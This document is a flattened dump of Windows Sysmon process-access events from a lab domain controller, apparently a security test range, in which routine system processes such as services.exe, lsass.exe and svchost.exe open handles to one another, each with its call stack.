15:51:15.534{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7C73-5FA1-2B00-000000008801}2724C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001178Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.534{D28789B6-7C62-5FA1-0A00-000000008801}852936C:\Windows\system32\services.exe{D28789B6-7C73-5FA1-2B00-000000008801}2724C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+297d|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001177Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.534{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001176Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.534{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001175Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.534{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001174Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.534{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001173Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:11.472{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001172Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:11.472{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001171Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:10.316{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C6E-5FA1-2900-000000008801}2040C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001170Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:10.316{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C6E-5FA1-2900-000000008801}2040C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001169Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:10.316{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C6E-5FA1-2900-000000008801}2040C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001168Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:10.316{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C6E-5FA1-2900-000000008801}2040C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001167Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:10.316{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C6E-5FA1-2900-000000008801}2040C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001166Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:10.316{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C6E-5FA1-2900-000000008801}2040C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001165Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:10.316{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C6E-5FA1-2900-000000008801}2040C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001164Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:10.316{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C6E-5FA1-2900-000000008801}2040C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001163Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:10.316{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C6E-5FA1-2900-000000008801}2040C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001162Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:10.316{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C6E-5FA1-2900-000000008801}2040C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001161Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:10.316{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C6E-5FA1-2900-000000008801}2040C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001160Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:10.316{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C6E-5FA1-2900-000000008801}2040C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001159Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:10.316{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C6E-5FA1-2900-000000008801}2040C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001158Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:10.300{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C6E-5FA1-2900-000000008801}2040C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001157Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:10.300{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C61-5FA1-0100-000000008801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001156Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:10.300{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C61-5FA1-0100-000000008801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001155Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 